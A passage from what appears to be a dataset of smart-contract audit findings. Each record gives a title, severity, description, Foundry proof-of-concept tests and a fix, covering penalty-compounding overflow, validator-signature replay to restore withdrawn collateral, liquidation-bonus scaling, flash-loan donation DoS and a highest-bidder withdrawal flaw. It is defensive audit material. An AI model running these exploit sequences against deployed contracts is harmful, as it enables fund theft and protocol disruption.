minterRate >= totalEarning * earnerRate\\n // 2. 
totalActive * minterRate / totalEarning >= earnerRate\\n // solhint-enable max-line-length\\n\\n if (totalActiveOwedM_ == 0) return 0;\\n\\n if (totalEarningSupply_ == 0) return type(uint32).max;\\n\\n if (totalActiveOwedM_ <= totalEarningSupply_) {//@audit-info rate is slashed\\n // NOTE: `totalActiveOwedM_ * minterRate_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n return uint32((uint256(totalActiveOwedM_) * minterRate_) / totalEarningSupply_);\\n }\\n\\n uint48 deltaMinterIndex_ = ContinuousIndexingMath.getContinuousIndex(\\n ContinuousIndexingMath.convertFromBasisPoints(minterRate_),\\n RATE_CONFIDENCE_INTERVAL\\n );//@audit-info deltaMinterIndex for 30 days\\n\\n // NOTE: `totalActiveOwedM_ * deltaMinterIndex_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n int256 lnArg_ = int256(\\n _EXP_SCALED_ONE +\\n ((uint256(totalActiveOwedM_) * (deltaMinterIndex_ - _EXP_SCALED_ONE)) / totalEarningSupply_)\\n );\\n\\n int256 lnResult_ = wadLn(lnArg_ * _WAD_TO_EXP_SCALER) / _WAD_TO_EXP_SCALER;\\n\\n uint256 expRate_ = (uint256(lnResult_) * ContinuousIndexingMath.SECONDS_PER_YEAR) / RATE_CONFIDENCE_INTERVAL;\\n\\n if (expRate_ > type(uint64).max) return type(uint32).max;\\n\\n // NOTE: Do not need to do `UIntMath.safe256` because it is known that `lnResult_` will not be negative.\\n uint40 safeRate_ = ContinuousIndexingMath.convertToBasisPoints(uint64(expRate_));\\n\\n return (safeRate_ > type(uint32).max) ? type(uint32).max : uint32(safeRate_);\\n }\\n```\\n\\nAs we can see, the rate may vary due to the changes in `MToken#totalEarningSupply()`, therefore the earning of fixed principal amount could be decreased if `totalEarningSupply()` increases. 
In some other cases the total earning rewards increases significantly if `totalEarningSupply()` increases, resulting in less `excessOwedM` sending to `ttgVault` when `MinterGateway#updateIndex()` is called.\\nCopy below codes to Integration.t.sol and run `forge test --match-test test_aliceStillEarnAfterDisapproved`\\n```\\n function test_AliceStillEarnAfterDisapproved() external {\\n\\n _registrar.updateConfig(MAX_EARNER_RATE, 40000);\\n _minterGateway.activateMinter(_minters[0]);\\n\\n uint256 collateral = 1_000_000e6;\\n _updateCollateral(_minters[0], collateral);\\n\\n _mintM(_minters[0], 400e6, _bob);\\n _mintM(_minters[0], 400e6, _alice);\\n uint aliceInitialBalance = _mToken.balanceOf(_alice);\\n uint bobInitialBalance = _mToken.balanceOf(_bob);\\n //@audit-info alice and bob had the same M balance\\n assertEq(aliceInitialBalance, bobInitialBalance);\\n //@audit-info alice and bob started earning\\n vm.prank(_alice);\\n _mToken.startEarning();\\n vm.prank(_bob);\\n _mToken.startEarning();\\n\\n vm.warp(block.timestamp + 1 days);\\n uint aliceEarningDay1 = _mToken.balanceOf(_alice) - aliceInitialBalance;\\n uint bobEarningDay1 = _mToken.balanceOf(_bob) - bobInitialBalance;\\n //@audit-info Alice and Bob have earned the same M in day 1\\n assertNotEq(aliceEarningDay1, 0);\\n assertEq(aliceEarningDay1, bobEarningDay1);\\n //@audit-info Alice was removed from earner list\\n _registrar.removeFromList(TTGRegistrarReader.EARNERS_LIST, _alice);\\n vm.warp(block.timestamp + 1 days);\\n uint aliceEarningDay2 = _mToken.balanceOf(_alice) - aliceInitialBalance - aliceEarningDay1;\\n uint bobEarningDay2 = _mToken.balanceOf(_bob) - bobInitialBalance - bobEarningDay1;\\n //@audit-info Alice still earned M in day 2 even she was removed from earner list, the amount of which is same as Bob's earning\\n assertNotEq(aliceEarningDay2, 0);\\n assertEq(aliceEarningDay2, bobEarningDay2);\\n\\n uint earnerRateBefore = _mToken.earnerRate();\\n //@audit-info Only Alice can stop herself 
from earning\\n vm.prank(_alice);\\n _mToken.stopEarning();\\n uint earnerRateAfter = _mToken.earnerRate();\\n //@audit-info The earning rate was almost doubled after Alice called `stopEarning`\\n assertApproxEqRel(earnerRateBefore*2, earnerRateAfter, 0.01e18);\\n vm.warp(block.timestamp + 1 days);\\n uint aliceEarningDay3 = _mToken.balanceOf(_alice) - aliceInitialBalance - aliceEarningDay1 - aliceEarningDay2;\\n uint bobEarningDay3 = _mToken.balanceOf(_bob) - bobInitialBalance - bobEarningDay1 - bobEarningDay2;\\n //@audit-info Alice earned nothing \\n assertEq(aliceEarningDay3, 0);\\n //@audit-info Bob's earnings on day 3 were almost twice as much as what he earned on day 2.\\n assertApproxEqRel(bobEarningDay2*2, bobEarningDay3, 0.01e18);\\n }\\n```\\n",Introduce a method that allows anyone to stop the disapproved earner from earning:\\n```\\n function stopEarning(address account_) external {\\n if (_isApprovedEarner(account_)) revert IsApprovedEarner();\\n _stopEarning(account_);\\n }\\n```\\n,The earnings of eligible users could potentially be diluted.\\nThe `excessOwedM` to ZERO vault holders could be diluted,"```\\n function rate() external view returns (uint256) {\\n uint256 safeEarnerRate_ = getSafeEarnerRate(\\n IMinterGateway(minterGateway).totalActiveOwedM(),\\n IMToken(mToken).totalEarningSupply(),\\n IMinterGateway(minterGateway).minterRate()\\n );\\n\\n return UIntMath.min256(maxRate(), (RATE_MULTIPLIER * safeEarnerRate_) / ONE);\\n }\\n\\n function getSafeEarnerRate(\\n uint240 totalActiveOwedM_,\\n uint240 totalEarningSupply_,\\n uint32 minterRate_\\n ) public pure returns (uint32) {\\n // solhint-disable max-line-length\\n // When `totalActiveOwedM_ >= totalEarningSupply_`, it is possible for the earner rate to be higher than the\\n // minter rate and still ensure cashflow safety over some period of time (`RATE_CONFIDENCE_INTERVAL`). 
To ensure\\n // cashflow safety, we start with `cashFlowOfActiveOwedM >= cashFlowOfEarningSupply` over some time `dt`.\\n // Effectively: p1 * (exp(rate1 * dt) - 1) >= p2 * (exp(rate2 * dt) - 1)\\n // So: rate2 <= ln(1 + (p1 * (exp(rate1 * dt) - 1)) / p2) / dt\\n // 1. totalActive * (delta_minterIndex - 1) >= totalEarning * (delta_earnerIndex - 1)\\n // 2. totalActive * (delta_minterIndex - 1) / totalEarning >= delta_earnerIndex - 1\\n // 3. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= delta_earnerIndex\\n // Substitute `delta_earnerIndex` with `exponent((earnerRate * dt) / SECONDS_PER_YEAR)`:\\n // 4. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= exponent((earnerRate * dt) / SECONDS_PER_YEAR)\\n // 5. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) >= (earnerRate * dt) / SECONDS_PER_YEAR\\n // 6. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) * SECONDS_PER_YEAR / dt >= earnerRate\\n\\n // When `totalActiveOwedM_ < totalEarningSupply_`, the instantaneous earner cash flow must be less than the\\n // instantaneous minter cash flow. To ensure instantaneous cashflow safety, we we use the derivatives of the\\n // previous starting inequality, and substitute `dt = 0`.\\n // Effectively: p1 * rate1 >= p2 * rate2\\n // So: rate2 <= p1 * rate1 / p2\\n // 1. totalActive * minterRate >= totalEarning * earnerRate\\n // 2. 
totalActive * minterRate / totalEarning >= earnerRate\\n // solhint-enable max-line-length\\n\\n if (totalActiveOwedM_ == 0) return 0;\\n\\n if (totalEarningSupply_ == 0) return type(uint32).max;\\n\\n if (totalActiveOwedM_ <= totalEarningSupply_) {//@audit-info rate is slashed\\n // NOTE: `totalActiveOwedM_ * minterRate_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n return uint32((uint256(totalActiveOwedM_) * minterRate_) / totalEarningSupply_);\\n }\\n\\n uint48 deltaMinterIndex_ = ContinuousIndexingMath.getContinuousIndex(\\n ContinuousIndexingMath.convertFromBasisPoints(minterRate_),\\n RATE_CONFIDENCE_INTERVAL\\n );//@audit-info deltaMinterIndex for 30 days\\n\\n // NOTE: `totalActiveOwedM_ * deltaMinterIndex_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n int256 lnArg_ = int256(\\n _EXP_SCALED_ONE +\\n ((uint256(totalActiveOwedM_) * (deltaMinterIndex_ - _EXP_SCALED_ONE)) / totalEarningSupply_)\\n );\\n\\n int256 lnResult_ = wadLn(lnArg_ * _WAD_TO_EXP_SCALER) / _WAD_TO_EXP_SCALER;\\n\\n uint256 expRate_ = (uint256(lnResult_) * ContinuousIndexingMath.SECONDS_PER_YEAR) / RATE_CONFIDENCE_INTERVAL;\\n\\n if (expRate_ > type(uint64).max) return type(uint32).max;\\n\\n // NOTE: Do not need to do `UIntMath.safe256` because it is known that `lnResult_` will not be negative.\\n uint40 safeRate_ = ContinuousIndexingMath.convertToBasisPoints(uint64(expRate_));\\n\\n return (safeRate_ > type(uint32).max) ? 
type(uint32).max : uint32(safeRate_);\\n }\\n```\\n" +"Malicious minters can repeatedly penalize their undercollateralized accounts in a short period of time, which can result in malfunctioning of critical protocol functions, such as `mintM`.",medium,"Malicious minters can exploit the `updateCollateral()` function to repeatedly penalize their undercollateralized accounts in a short period of time. This can cause the `principalOfTotalActiveOwedM` to reach the `uint112.max` limit, disabling some critical functions, such as `mintM`.\\nThe `updateCollateral()` function allows minters to update their collateral status to the protocol, with penalties imposed in two scenarios:\\nA penalty is imposed for each missing collateral update interval.\\nA penalty is imposed if a minter is undercollateralized.\\nThe critical issue arises with the penalty for being undercollateralized, which is imposed on each call to `updateCollateral()`. This penalty is compounded, calculated as `penaltyRate * (principalOfActiveOwedM_ - principalOfMaxAllowedActiveOwedM_)`, and the `principalOfActiveOwedM_` increases with each imposed penalty.\\nProof Of Concept\\nWe can do a simple calculation, using the numbers from unit tests, mintRatio=90%, penaltyRate=1%, updateCollateralInterval=2000 (seconds). A malicious minter deposits `$100,000` t-bills as collateral, and mints `$90,000` M tokens. Since M tokens have 6 decimals, the collateral would be `100000e6`. Following the steps below, the malicious minter would be able to increase `principalOfActiveOwedM_` close to uint112.max limit:\\nDeposit collateral and mint M tokens.\\nWait for 4 collateral update intervals. This is for accumulating some initial penalty to get undercollateralized.\\nCall `updateCollateral()`. The penalty for missing updates would be `4 * 90000e6 * 1% = 36e8`.\\nStarting from `36e8`, we can keep calling `updateCollateral()` to compound penalty for undercollateralization. Each time would increase the penalty by 1%. 
We only need `log(2^112 / `36e8`, 1.01) ~ 5590` times to hit `uint112.max` limit.\\nAdd the following testing code to `MinterGateway.t.sol`. We can see in logs that `principalOfTotalActiveOwedM` has hit uint112.max limit.\\n```\\n penalty: 1 94536959275 94536000000\\n penalty: 2 95482328867 95481360000\\n penalty: 3 96437152156 96436173600\\n penalty: 4 97401523678 97400535336\\n penalty: 5 98375538914 98374540689\\n penalty: 6 99359294302 99358286095\\n penalty: 7 100352887244 100351868955\\n penalty: 8 101356416116 101355387644\\n penalty: 9 102369980277 102368941520\\n penalty: 10 103393680080 103392630935\\n // rest of code\\n penalty: 5990 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5991 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5992 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5993 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5994 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5995 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5996 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5997 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5998 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5999 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 6000 5192349545726433803396851311815959 5192296858534827628530496329220095\\n```\\n\\n```\\n // Using default test settings: mintRatio = 90%, penaltyRate = 1%, updateCollateralInterval = 2000.\\n function test_penaltyForUndercollateralization() external {\\n // 1. 
Minter1 deposits $100,000 t-bills, and mints 90,000 $M Tokens.\\n uint initialTimestamp = block.timestamp;\\n _minterGateway.setCollateralOf(_minter1, 100000e6);\\n _minterGateway.setUpdateTimestampOf(_minter1, initialTimestamp);\\n _minterGateway.setRawOwedMOf(_minter1, 90000e6);\\n _minterGateway.setPrincipalOfTotalActiveOwedM(90000e6);\\n\\n // 2. Minter does not update for 4 updateCollateralIntervals, causing penalty for missing updates.\\n vm.warp(initialTimestamp + 4 * _updateCollateralInterval);\\n\\n // 3. Minter fetches a lot of signatures from validator, each with different timestamp and calls `updateCollateral()` many times.\\n // Since the penalty for uncollateralization is counted every time, and would hit `uint112.max` at last.\\n uint256[] memory retrievalIds = new uint256[](0);\\n address[] memory validators = new address[](1);\\n validators[0] = _validator1;\\n\\n for (uint i = 1; i <= 6000; ++i) {\\n\\n uint256[] memory timestamps = new uint256[](1);\\n uint256 signatureTimestamp = initialTimestamp + i;\\n timestamps[0] = signatureTimestamp;\\n bytes[] memory signatures = new bytes[](1);\\n signatures[0] = _getCollateralUpdateSignature(\\n address(_minterGateway),\\n _minter1,\\n 100000e6,\\n retrievalIds,\\n bytes32(0),\\n signatureTimestamp,\\n _validator1Pk\\n );\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(100000e6, retrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n console.log(""penalty:"", i, _minterGateway.totalActiveOwedM(), _minterGateway.principalOfTotalActiveOwedM());\\n }\\n }\\n```\\n\\nNote that in real use case, the penalty rate may lower (e.g. 0.1%), however, `log(2^112 / 36e8, 1.001) ~ 55656` is still a reasonable amount since there are 1440 minutes in 1 day (not to mention if the frequency for signature may be higher than once per minute). 
A malicious minter can still gather enough signatures for the attack.",Consider only imposing penalty for undercollateralization for each update interval.,"The direct impact is that `principalOfTotalActiveOwedM` will hit `uint112.max` limit. All related protocol features would be disfunctioned, the most important one being `mintM`, since the function would revert if `principalOfTotalActiveOwedM` hits `uint112.max` limit.\\n```\\n unchecked {\\n uint256 newPrincipalOfTotalActiveOwedM_ = uint256(principalOfTotalActiveOwedM_) + principalAmount_;\\n\\n // As an edge case precaution, prevent a mint that, if all owed M (active and inactive) was converted to\\n // a principal active amount, would overflow the `uint112 principalOfTotalActiveOwedM`.\\n> if (\\n> // NOTE: Round the principal up for worst case.\\n> newPrincipalOfTotalActiveOwedM_ + _getPrincipalAmountRoundedUp(totalInactiveOwedM) >= type(uint112).max\\n> ) {\\n> revert OverflowsPrincipalOfTotalOwedM();\\n> }\\n\\n principalOfTotalActiveOwedM = uint112(newPrincipalOfTotalActiveOwedM_);\\n _rawOwedM[msg.sender] += principalAmount_; // Treat rawOwedM as principal since minter is active.\\n }\\n```\\n",```\\n penalty: 1 94536959275 94536000000\\n penalty: 2 95482328867 95481360000\\n penalty: 3 96437152156 96436173600\\n penalty: 4 97401523678 97400535336\\n penalty: 5 98375538914 98374540689\\n penalty: 6 99359294302 99358286095\\n penalty: 7 100352887244 100351868955\\n penalty: 8 101356416116 101355387644\\n penalty: 9 102369980277 102368941520\\n penalty: 10 103393680080 103392630935\\n // rest of code\\n penalty: 5990 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5991 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5992 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5993 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5994 5192349545726433803396851311815959 
5192296858534827628530496329220095\\n penalty: 5995 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5996 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5997 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5998 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 5999 5192349545726433803396851311815959 5192296858534827628530496329220095\\n penalty: 6000 5192349545726433803396851311815959 5192296858534827628530496329220095\\n```\\n +Validator threshold can be bypassed: a single compromised validator can update minter's state to historical state,medium,"The `updateCollateralValidatorThreshold` specifies the minimum number of validators needed to confirm the validity of `updateCollateral` data. However, just one compromised validator is enough to alter a minter's collateral status. In particular, this vulnerability allows the compromised validator to set the minter's state back to a historical state, allowing malicious minters to increase their collateral.\\nThe `updateCollateral()` function calls the `_verifyValidatorSignatures()` function, which calculates the minimum timestamp signed by all validators. This timestamp is then used to update the minter state's `_minterStates[minter_].updateTimestamp`. 
The constraint during this process is that the `_minterStates[minter_].updateTimestamp` must always be increasing.\\nFunction updateCollateral():\\n```\\n minTimestamp_ = _verifyValidatorSignatures(\\n msg.sender,\\n collateral_,\\n retrievalIds_,\\n metadataHash_,\\n validators_,\\n timestamps_,\\n signatures_\\n );\\n // rest of code\\n _updateCollateral(msg.sender, safeCollateral_, minTimestamp_);\\n // rest of code\\n```\\n\\nFunction _updateCollateral():\\n```\\n function _updateCollateral(address minter_, uint240 amount_, uint40 newTimestamp_) internal {\\n uint40 lastUpdateTimestamp_ = _minterStates[minter_].updateTimestamp;\\n\\n // MinterGateway already has more recent collateral update\\n if (newTimestamp_ <= lastUpdateTimestamp_) revert StaleCollateralUpdate(newTimestamp_, lastUpdateTimestamp_);\\n\\n _minterStates[minter_].collateral = amount_;\\n _minterStates[minter_].updateTimestamp = newTimestamp_;\\n }\\n```\\n\\nIf we have 1 compromised validator, its signature can be manipulated to any chosen timestamp. Consequently, this allows for control over the timestamp in `_minterStates[minter_].updateTimestamp` making it possible to update the minter's state to a historical state. An example is given in the following proof of concept. The key here is that even though `updateCollateralValidatorThreshold` may be set to 2 or even 3, as long as 1 validator is compromised, the attack vector would work, thus defeating the purpose of having a validator threshold.\\nProof Of Concept\\nIn this unit test, `updateCollateralInterval` is set to 2000 (default value). The `updateCollateralValidatorThreshold` is set to 2, and the `_validator1` is compromised. Following the steps below, we show how we update minter to a historical state:\\nInitial timestamp is `T0`.\\n100 seconds passed, the current timestamp is `T0+100`. Deposit 100e6 collateral at `T0+100`. `_validator0` signs signature at `T0+100`, and `_validator1` signs signature at `T0+1`. 
After `updateCollateral()`, minter state collateral = 100e6, and updateTimestamp = `T0+1`.\\nAnother 100 seconds passed, the current timestamp is `T0+200`. Propose retrieval for all collateral, and perform the retrieval offchain. `_validator0` signs signature at `T0+200`, and `_validator1` signs signature at `T0+2`. After `updateCollateral()`, minter state collateral = 0, and updateTimestamp = `T0+2`.\\nAnother 100 seconds passed, the current timestamp is `T0+300`. Reuse `_validator0` signature from step 1, it is signed on timestamp `T0+100`. `_validator1` signs collateral=100e6 at `T0+3`. After `updateCollateral()`, minter state collateral = 100e6, and updateTimestamp = `T0+3`.\\nNow, the minter is free to perform minting actions since his state claims collateral is 100e6, even though he has already retrieved it back in step 2. The mint proposal may even be proposed between step 1 and step 2 to reduce the mintDelay the minter has to wait.\\nAdd the following testing code to `MinterGateway.t.sol`. See more description in code comments.\\n```\\n function test_collateralStatusTimeTravelBySingleHackedValidator() external {\\n _ttgRegistrar.updateConfig(TTGRegistrarReader.UPDATE_COLLATERAL_VALIDATOR_THRESHOLD, bytes32(uint256(2)));\\n\\n // Arrange validator addresses in increasing order.\\n address[] memory validators = new address[](2);\\n validators[0] = _validator2;\\n validators[1] = _validator1;\\n\\n uint initialTimestamp = block.timestamp;\\n bytes[] memory cacheSignatures = new bytes[](2);\\n // 1. 
Deposit 100e6 collateral, and set malicious validator timestamp to `initialTimestamp+1` during `updateCollateral()`.\\n {\\n vm.warp(block.timestamp + 100);\\n\\n uint256[] memory retrievalIds = new uint256[](0);\\n uint256[] memory timestamps = new uint256[](2);\\n timestamps[0] = block.timestamp;\\n timestamps[1] = initialTimestamp + 1;\\n\\n bytes[] memory signatures = new bytes[](2);\\n signatures[0] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 100e6, retrievalIds, bytes32(0), block.timestamp, _validator2Pk);\\n signatures[1] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 100e6, retrievalIds, bytes32(0), initialTimestamp + 1, _validator1Pk);\\n cacheSignatures = signatures;\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(100e6, retrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n assertEq(_minterGateway.collateralOf(_minter1), 100e6);\\n assertEq(_minterGateway.collateralUpdateTimestampOf(_minter1), initialTimestamp + 1);\\n }\\n\\n // 2. 
Retrieve all collateral, and set malicious validator timestamp to `initialTimestamp+2` during `updateCollateral()`.\\n {\\n vm.prank(_minter1);\\n uint256 retrievalId = _minterGateway.proposeRetrieval(100e6);\\n\\n vm.warp(block.timestamp + 100);\\n\\n uint256[] memory newRetrievalIds = new uint256[](1);\\n newRetrievalIds[0] = retrievalId;\\n\\n uint256[] memory timestamps = new uint256[](2);\\n timestamps[0] = block.timestamp;\\n timestamps[1] = initialTimestamp + 2;\\n\\n bytes[] memory signatures = new bytes[](2);\\n signatures[0] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 0, newRetrievalIds, bytes32(0), block.timestamp, _validator2Pk);\\n signatures[1] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 0, newRetrievalIds, bytes32(0), initialTimestamp + 2, _validator1Pk);\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(0, newRetrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n assertEq(_minterGateway.collateralOf(_minter1), 0);\\n assertEq(_minterGateway.collateralUpdateTimestampOf(_minter1), initialTimestamp + 2);\\n }\\n\\n // 3. 
Reuse signature from step 1, and set malicious validator timestamp to `initialTimestamp+3` during `updateCollateral()`.\\n // We have successfully ""travelled back in time"", and minter1's collateral is back to 100e6.\\n {\\n vm.warp(block.timestamp + 100);\\n\\n uint256[] memory retrievalIds = new uint256[](0);\\n uint256[] memory timestamps = new uint256[](2);\\n timestamps[0] = block.timestamp - 200;\\n timestamps[1] = initialTimestamp + 3;\\n\\n bytes[] memory signatures = new bytes[](2);\\n signatures[0] = cacheSignatures[0];\\n signatures[1] = _getCollateralUpdateSignature(address(_minterGateway), _minter1, 100e6, retrievalIds, bytes32(0), initialTimestamp + 3, _validator1Pk);\\n\\n vm.prank(_minter1);\\n _minterGateway.updateCollateral(100e6, retrievalIds, bytes32(0), validators, timestamps, signatures);\\n\\n assertEq(_minterGateway.collateralOf(_minter1), 100e6);\\n assertEq(_minterGateway.collateralUpdateTimestampOf(_minter1), initialTimestamp + 3);\\n }\\n }\\n```\\n","Use the maximum timestamp of all validators instead of minimum, or take the threshold-last minimum instead of the most minimum.","As shown in the proof of concept, the minter can use the extra collateral to mint M tokens for free.\\nOne may claim that during minting, the `collateralOf()` function checks for `block.timestamp < collateralExpiryTimestampOf(minter_)`, however, since during deployment `updateCollateralInterval` is set to 86400, that gives us enough time to perform the attack vector before ""fake"" collateral expires.","```\\n minTimestamp_ = _verifyValidatorSignatures(\\n msg.sender,\\n collateral_,\\n retrievalIds_,\\n metadataHash_,\\n validators_,\\n timestamps_,\\n signatures_\\n );\\n // rest of code\\n _updateCollateral(msg.sender, safeCollateral_, minTimestamp_);\\n // rest of code\\n```\\n" +Liquidation bonus scales exponentially instead of linearly.,medium,"Liquidation bonus scales exponentially instead of linearly.\\nLet's look at the code of 
`getLiquidationBonus`\\n```\\n function getLiquidationBonus(\\n address token,\\n uint256 borrowedAmount,\\n uint256 times\\n ) public view returns (uint256 liquidationBonus) {\\n // Retrieve liquidation bonus for the given token\\n Liquidation memory liq = liquidationBonusForToken[token];\\n unchecked {\\n if (liq.bonusBP == 0) {\\n // If there is no specific bonus for the token\\n // Use default bonus\\n liq.minBonusAmount = Constants.MINIMUM_AMOUNT;\\n liq.bonusBP = dafaultLiquidationBonusBP;\\n }\\n liquidationBonus = (borrowedAmount * liq.bonusBP) / Constants.BP;\\n\\n if (liquidationBonus < liq.minBonusAmount) {\\n liquidationBonus = liq.minBonusAmount;\\n }\\n liquidationBonus *= (times > 0 ? times : 1);\\n }\\n }\\n```\\n\\nAs we can see, the liquidation bonus is based on the entire `borrowAmount` and multiplied by the number of new loans added. The problem is that it is unfair when the user makes a borrow against multiple lenders.\\nIf a user takes a borrow for X against 1 lender, they'll have to pay a liquidation bonus of Y. 
However, if they take a borrow for 3X against 3 lenders, they'll have to pay 9Y, meaning that taking a borrow against N lenders leads to overpaying liquidation bonus by N times.\\nFurthermore, if the user simply does it in multiple transactions, they can avoid these extra fees (as they can simply call `borrow` for X 3 times and pay 3Y in Liquidation bonuses)",make liquidation bonus simply a % of totalBorrowed,Loss of funds,"```\\n function getLiquidationBonus(\\n address token,\\n uint256 borrowedAmount,\\n uint256 times\\n ) public view returns (uint256 liquidationBonus) {\\n // Retrieve liquidation bonus for the given token\\n Liquidation memory liq = liquidationBonusForToken[token];\\n unchecked {\\n if (liq.bonusBP == 0) {\\n // If there is no specific bonus for the token\\n // Use default bonus\\n liq.minBonusAmount = Constants.MINIMUM_AMOUNT;\\n liq.bonusBP = dafaultLiquidationBonusBP;\\n }\\n liquidationBonus = (borrowedAmount * liq.bonusBP) / Constants.BP;\\n\\n if (liquidationBonus < liq.minBonusAmount) {\\n liquidationBonus = liq.minBonusAmount;\\n }\\n liquidationBonus *= (times > 0 ? times : 1);\\n }\\n }\\n```\\n" +"When the amout of token acquired by a flash loan exceeds the expected value, the callback function will fail.",medium,"When the amout of token acquired by a flash loan exceeds the expected value, the callback function will fail.\\nThe function `wagmiLeverageFlashCallback` is used to handle the repayment operation after flash loan. After obtaining enough saleToken, it uses `_v3SwapExact` to convert the saleToken into holdToken. We know that the amount of holdTokens (holdTokenAmtIn) is proportional to the amount of saleTokens (amountToPay) obtained from flash loans. 
Later, the function will check the `holdTokenAmtIn` is no large than decodedData.holdTokenDebt.\\n```\\n// Swap tokens to repay the flash loan\\nuint256 holdTokenAmtIn = _v3SwapExact(\\n v3SwapExactParams({\\n isExactInput: false,\\n fee: decodedData.fee,\\n tokenIn: decodedData.holdToken,\\n tokenOut: decodedData.saleToken,\\n amount: amountToPay\\n })\\n);\\ndecodedData.holdTokenDebt -= decodedData.zeroForSaleToken\\n ? decodedData.amounts.amount1\\n : decodedData.amounts.amount0;\\n\\n// Check for strict route adherence, revert the transaction if conditions are not met\\n(decodedData.routes.strict && holdTokenAmtIn > decodedData.holdTokenDebt).revertError(\\n ErrLib.ErrorCode.SWAP_AFTER_FLASH_LOAN_FAILED\\n);\\n```\\n\\nIn the function `_excuteCallback`, the amount of token finally obtained by the user through flash loan is `flashBalance`, which is the balance of the contract.\\n```\\n// Transfer the flashBalance to the recipient\\ndecodedData.saleToken.safeTransfer(decodedDataExt.recipient, flashBalance);\\n// Invoke the WagmiLeverage callback function with updated parameters\\nIWagmiLeverageFlashCallback(decodedDataExt.recipient).wagmiLeverageFlashCallback(\\n flashBalance,\\n interest,\\n decodedDataExt.originData\\n);\\n```\\n\\nNow let me describe how the attacker compromises the flash loans.\\nFirst, the attacker makes a donation to the `FlashLoanAggregator` contract before the victim performs a flash loan (using front-run). Then victim performs a flash loan, and he/she will get much more flashBalance than expected. 
Finally, in the function `wagmiLeverageFlashCallback`, the holdTokenAmtIn is larger than expected, which causes the callback to fail.","In the function `_excuteCallback`, the amount of token finally obtained by the user through flash loan should be the balance difference during the flash loan period.",DOS,"```\\n// Swap tokens to repay the flash loan\\nuint256 holdTokenAmtIn = _v3SwapExact(\\n    v3SwapExactParams({\\n        isExactInput: false,\\n        fee: decodedData.fee,\\n        tokenIn: decodedData.holdToken,\\n        tokenOut: decodedData.saleToken,\\n        amount: amountToPay\\n    })\\n);\\ndecodedData.holdTokenDebt -= decodedData.zeroForSaleToken\\n    ? decodedData.amounts.amount1\\n    : decodedData.amounts.amount0;\\n\\n// Check for strict route adherence, revert the transaction if conditions are not met\\n(decodedData.routes.strict && holdTokenAmtIn > decodedData.holdTokenDebt).revertError(\\n    ErrLib.ErrorCode.SWAP_AFTER_FLASH_LOAN_FAILED\\n);\\n```\\n" +Highest bidder can withdraw his collateral due to a missing check in _cancelAllBids,high,"A bidder with the highest bid cannot cancel his bid since this would break the auction. 
A check to ensure this was implemented in `_cancelBid`.\\nHowever, this check was not implemented in `_cancelAllBids`, allowing the highest bidder to withdraw his collateral and win the auction for free.\\nThe highest bidder should not be able to cancel his bid, since this would break the entire auction mechanism.\\nIn `_cancelBid` we can find a require check that ensures this:\\n```\\n require(\\n bidder != l.highestBids[tokenId][round].bidder,\\n 'EnglishPeriodicAuction: Cannot cancel bid if highest bidder'\\n );\\n```\\n\\nYet in `_cancelAllBids`, this check was not implemented.\\n```\\n * @notice Cancel bids for all rounds\\n */\\n function _cancelAllBids(uint256 tokenId, address bidder) internal {\\n EnglishPeriodicAuctionStorage.Layout\\n storage l = EnglishPeriodicAuctionStorage.layout();\\n\\n uint256 currentAuctionRound = l.currentAuctionRound[tokenId];\\n\\n for (uint256 i = 0; i <= currentAuctionRound; i++) {\\n Bid storage bid = l.bids[tokenId][i][bidder];\\n\\n if (bid.collateralAmount > 0) {\\n // Make collateral available to withdraw\\n l.availableCollateral[bidder] += bid.collateralAmount;\\n\\n // Reset collateral and bid\\n bid.collateralAmount = 0;\\n bid.bidAmount = 0;\\n }\\n }\\n }\\n```\\n\\nExample: User Bob bids 10 eth and takes the highest bidder spot. Bob calls `cancelAllBidsAndWithdrawCollateral`.\\nThe `_cancelAllBids` function is called and this makes all the collateral from all his bids from every round available to Bob. This includes the current round `<=` and does not check if Bob is the current highest bidder. Nor is `l.highestBids[tokenId][round].bidder` reset, so the system still has Bob as the highest bidder.\\nThen `_withdrawCollateral` is automatically called and Bob receives his 10 eth back.\\nThe auction ends. 
